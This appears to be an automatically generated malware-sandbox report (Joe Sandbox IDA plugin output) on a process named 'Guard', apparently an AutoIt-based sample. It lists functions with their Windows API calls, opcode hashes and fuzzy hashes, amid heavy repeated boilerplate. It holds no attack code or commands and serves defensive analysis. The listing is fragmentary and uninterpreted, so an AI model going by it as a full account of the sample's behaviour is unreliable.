Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 780f22b28d4d80038196e96c1699517030f15a2086089f2ac73f8194d1f2005d
Instruction ID: 33006dc8a36140c8b71f345a2fbae926a8a9619cd1bc8f9958cd7ac2136f1bc6
Opcode Fuzzy Hash: 780f22b28d4d80038196e96c1699517030f15a2086089f2ac73f8194d1f2005d
Instruction Fuzzy Hash: 5DF05E715692947EEA3117636D0CE377E7DD7C6F20F00031EB910A22B0C6711840EBB0

Function 00954148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0095416D
Process32FirstW.KERNEL32(00000000,?), ref: 0095417B
Process32NextW.KERNEL32(00000000,?), ref: 0095419B
CloseHandle.KERNEL32(00000000), ref: 00954245

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: d5346dccd007c0e3fdbe3bb868d8e1ac9ce0f0a156f9047e70d7726afb971c18
Instruction ID: ad519269fdf91f8a845d48b78d1d430c3a78ac92784a3f0ba478383b0049c525
Opcode Fuzzy Hash: d5346dccd007c0e3fdbe3bb868d8e1ac9ce0f0a156f9047e70d7726afb971c18
Instruction Fuzzy Hash: 2731C0711083019FD300EF50D885BAFBBE8AFD5315F40092DF992C21E1EB70AA89CB92

Function 0090278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 009049C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,009027AF,?,00000001), ref: 009049F4

_free.LIBCMT ref: 0093FB04
_free.LIBCMT ref: 0093FB4B

Part of subcall function 009029BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00902ADF

Strings

Bad directive syntax error, xrefs: 0093FB33

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: 4954c2356c6b0fcd27a811c5860906234a4c42e55018b571b56da5b01d593336
Instruction ID: e16e69ccbd7d34f2a899ae61328e2f8457d4e5fed1729f346635b2891f7d1b6a
Opcode Fuzzy Hash: 4954c2356c6b0fcd27a811c5860906234a4c42e55018b571b56da5b01d593336
Instruction Fuzzy Hash: 45916F71D10219AFCF04EFA4C861AEEB7B8FF49310F14456AF815AB291EB349945CF50

Function 009020E0 Relevance: 4.9, APIs: 3, Instructions: 422COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 694a5759b1bdbc341c20c79ff67d66b232d1cfe3030b43202c1c2ee451f733a6
Instruction ID: b6c12d808601cd48e86f0a22f8f2ade70545a7bf3381cee4da3f2a25acb412da
Opcode Fuzzy Hash: 694a5759b1bdbc341c20c79ff67d66b232d1cfe3030b43202c1c2ee451f733a6
Instruction Fuzzy Hash: 42F1AF71E001199FCF18DF98C895AFEB7B9FF48700F50842AE816AB2D1DB359A51CB51

Function 008FAAAA Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 009107BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009107EC
Part of subcall function 009107BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 009107F4
Part of subcall function 009107BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009107FF
Part of subcall function 009107BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0091080A
Part of subcall function 009107BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00910812
Part of subcall function 009107BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0091081A

Part of subcall function 0090FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008FAC6B), ref: 0090FFA7

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008FAD08
OleInitialize.OLE32(00000000), ref: 008FAD85
CloseHandle.KERNEL32(00000000), ref: 00932F56

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: fbe2cce1ce2cfe57038c0458c39bb872e4ba631dbf1da6f72ae767063be37ce5
Instruction ID: 62213559c6b62f68fff5703f174f25ff93cddf055bbeebd73bb468a9e1326852
Opcode Fuzzy Hash: fbe2cce1ce2cfe57038c0458c39bb872e4ba631dbf1da6f72ae767063be37ce5
Instruction Fuzzy Hash: 4D819DB092C3408EC394EFB9AE85665FEE7EBC8326310876AD419D73B1EB705404AF51

Function 009048B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009048FA

Strings

EA06, xrefs: 009408A1

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: d4ffa6641aba3eff12c1a6bfea9692eeeead23b9226827e84f0404296ed30226
Instruction ID: 9f416fb6e4607a3f355f4eaaccd02f1cd3453bea3d58dc5195513069c98c08f7
Opcode Fuzzy Hash: d4ffa6641aba3eff12c1a6bfea9692eeeead23b9226827e84f0404296ed30226
Instruction Fuzzy Hash: BF41ADA2E041585FDF219B648D51BBF7FA98BC5B10F584474EF82EB2C6C6358D8483E2

Function 0096E139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 0096E20C

Part of subcall function 008F4D37: __itow.LIBCMT ref: 008F4D62
Part of subcall function 008F4D37: __swprintf.LIBCMT ref: 008F4DAC

_wcscpy.LIBCMT ref: 0096E29B

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: __itow__swprintf_strcat_wcscpy
String ID:
API String ID: 1012013722-0
Opcode ID: f278da3969a27377253c2fc5146e79ed0a831a55579aad0d139abeb2e43cf45c
Instruction ID: 7ed3320e5405653dfbbd10842b0075caa29663d448f6b503aa912fcad72c8dce
Opcode Fuzzy Hash: f278da3969a27377253c2fc5146e79ed0a831a55579aad0d139abeb2e43cf45c
Instruction Fuzzy Hash: 78913839A00608DFCB18EF28C5819A9B7E5FF89310B55845AE91ACF366DB30ED45CB81

Function 009042F9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00903E72,?,?,?,00000000), ref: 00904327
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00903E72,?,?,?,00000000), ref: 00940717

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8ca70dfc4a9fb3de894c1d65e9759fa390d2e05bf1288697a465f0f26f8edfb2
Instruction ID: 7badd9bf2d6fffa7f49f8b154ce29fee3139d08782e5ec428f8025b093b5fc6b
Opcode Fuzzy Hash: 8ca70dfc4a9fb3de894c1d65e9759fa390d2e05bf1288697a465f0f26f8edfb2
Instruction Fuzzy Hash: 780192B0248309BEF3600E24CD8AF667A9CEB01768F10C319FBE56A1E0C6B45C499B14

Function 00910FE6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0091593C: __FF_MSGBANNER.LIBCMT ref: 00915953
Part of subcall function 0091593C: __NMSG_WRITE.LIBCMT ref: 0091595A
Part of subcall function 0091593C: RtlAllocateHeap.NTDLL(01230000,00000000,00000001,?,00000004,?,?,00911003,?), ref: 0091597F

std::exception::exception.LIBCMT ref: 0091101C
__CxxThrowException@8.LIBCMT ref: 00911031

Part of subcall function 009187CB: RaiseException.KERNEL32(?,?,?,009ACAF8,?,?,?,?,?,00911036,?,009ACAF8,?,00000001), ref: 00918820

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 8e6971871725e65141fd277ad54487d86aaf4daa9fa37b72539aeb1615339900
Instruction ID: aeac3d4cdae974d2d6b7167916e37030e464b69b50b803f6d84b9371573dad06
Opcode Fuzzy Hash: 8e6971871725e65141fd277ad54487d86aaf4daa9fa37b72539aeb1615339900
Instruction Fuzzy Hash: 8DF0A43570431DB6CB20BA58EC16AEE7BEC9F45750F108455F914962D1EFB18BC1D2E1

Function 008FA820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac62e04d1df91ecf6990f674cfd25c4f6138154762f070c798a956bb49cb705a
Instruction ID: 16c480b43610e849db8db4b151360b70fc4d3df0a97f887b7699476ac4b9ac27
Opcode Fuzzy Hash: ac62e04d1df91ecf6990f674cfd25c4f6138154762f070c798a956bb49cb705a
Instruction Fuzzy Hash: 9761A2B060020E9FCB14DF64C481B7ABBE9FF44364F158169EA2AD7291D7B4ED81CB52

Function 0090410A Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 009041B2

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3e893e1ad0cf19ce08d7a0061b5e632884256a07830435644d006510fecf388e
Instruction ID: 265c281595e3eac495639fa2fa825c2922c10a442fc7667060c77fa8387e6330
Opcode Fuzzy Hash: 3e893e1ad0cf19ce08d7a0061b5e632884256a07830435644d006510fecf388e
Instruction Fuzzy Hash: BE3161B1A04616EFCB58CF6CC884A5DB7B5FFA4310F158619E91593750D770BDA0CB90

Function 00910E38 Relevance: 1.6, APIs: 1, Instructions: 94processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00910EE7

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 9418c2ff262e78195625d9d9fa453c898f441424c95863d2854f250776e2bd78
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 4E31B771B001099BD718DF59C5849A9FBAAFF99300B648AA5E40ACB351E772EDC1CBC0

Function 0092E2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0092E2EA

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 70d2010cda0881d63a6abda1ef7dba05c1659787c5e7271c1aec87d81080b17e
Instruction ID: ee6a9b8bad9b2881849fca4509a672750faee15a7d2d95b762cf9200fc9315ff
Opcode Fuzzy Hash: 70d2010cda0881d63a6abda1ef7dba05c1659787c5e7271c1aec87d81080b17e
Instruction Fuzzy Hash: 164118745083559FDB14DF24C484B2ABBE1FF84308F0989ACE5899B362D332EC95CB52

Function 009049C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00904B29: FreeLibrary.KERNEL32(00000000,?), ref: 00904B63

Part of subcall function 0091547B: __wfsopen.LIBCMT ref: 00915486

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,009027AF,?,00000001), ref: 009049F4

Part of subcall function 00904ADE: FreeLibrary.KERNEL32(00000000), ref: 00904B18

Part of subcall function 009048B0: _memmove.LIBCMT ref: 009048FA

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: d8354decf5fe57c4d8e7a04da799789c0ef2fabc525b5d5fddd07147b6226519
Instruction ID: be09b7d5bced3ac76d3392f5d5806c17da4ec8069d3752433990eadb94d3d6f4
Opcode Fuzzy Hash: d8354decf5fe57c4d8e7a04da799789c0ef2fabc525b5d5fddd07147b6226519
Instruction Fuzzy Hash: E8110A72750205AFDB10FB74CE06FAE77A99FC0701F10882DF642AA1D1EF759A14A794

Function 0092E3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0092E3CE

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: c2dccc7e5db18b58fb21fd283380a61b0e540a18ac751fb1e742487430210beb
Instruction ID: c89c6a01e4fd71fb027a547530612c989940bca28e68ae8b6dd4b032d4149a88
Opcode Fuzzy Hash: c2dccc7e5db18b58fb21fd283380a61b0e540a18ac751fb1e742487430210beb
Instruction Fuzzy Hash: 5D211574908359DFCB54DF24C444B2ABBE4FF88304F054A68FA8A97362D331E859CB52

Function 00904220 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00903CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00904276

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 9b4870dfaf1c5f305be942e4cb1be07e404f1562e9dd9043610a5f77b650ad41
Instruction ID: c6d09dba67ce82e20c94668a5d032c6d62bff8d239289525446b5797e4b099d7
Opcode Fuzzy Hash: 9b4870dfaf1c5f305be942e4cb1be07e404f1562e9dd9043610a5f77b650ad41
Instruction Fuzzy Hash: 1C113AB12047019FD720CF59C480B62B7F9EF88720F10C92DEABA86A90D770E845DB60

Function 0090408F Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009406BC

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 1f3b9db0a5d42e675f17063b09e5fb3495a3d79c440fe92c364792d37d1b7d4b
Instruction ID: 908547e6353338da0a64770d22580d2b580c999d9f36ae7d8096e5ae2ffb4525
Opcode Fuzzy Hash: 1f3b9db0a5d42e675f17063b09e5fb3495a3d79c440fe92c364792d37d1b7d4b
Instruction Fuzzy Hash: 31017CB9600502AFC305DB28C541E2AF7A9FFCA3503148159F959C7B42DB31EC61CBA0

Function 0096495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00964998

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 1d46b1a03fa0f1ddc688301f601d5aefbc07b233b370ff5e416482282b624010
Instruction ID: 70832af0672222c8044d0d12cff02502947bf60f8ae32b1cc166f242f366f07f
Opcode Fuzzy Hash: 1d46b1a03fa0f1ddc688301f601d5aefbc07b233b370ff5e416482282b624010
Instruction Fuzzy Hash: F5F08135608108BF8B10FBA5D806DAF7BBCEF89320B000056F9049B251DE70AD81C750

Function 00904A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00904AA4

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction ID: ff9f31a66f98e440a977510908d7562e81796917e9db9778d658cee30b2cec18
Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction Fuzzy Hash: A5F085B6500208FFDF148F84DC00DEBBB7DEF89320F00459CFA045A210D232EA618BA0

Function 00904A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,009027AF,?,00000001), ref: 00904A63

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

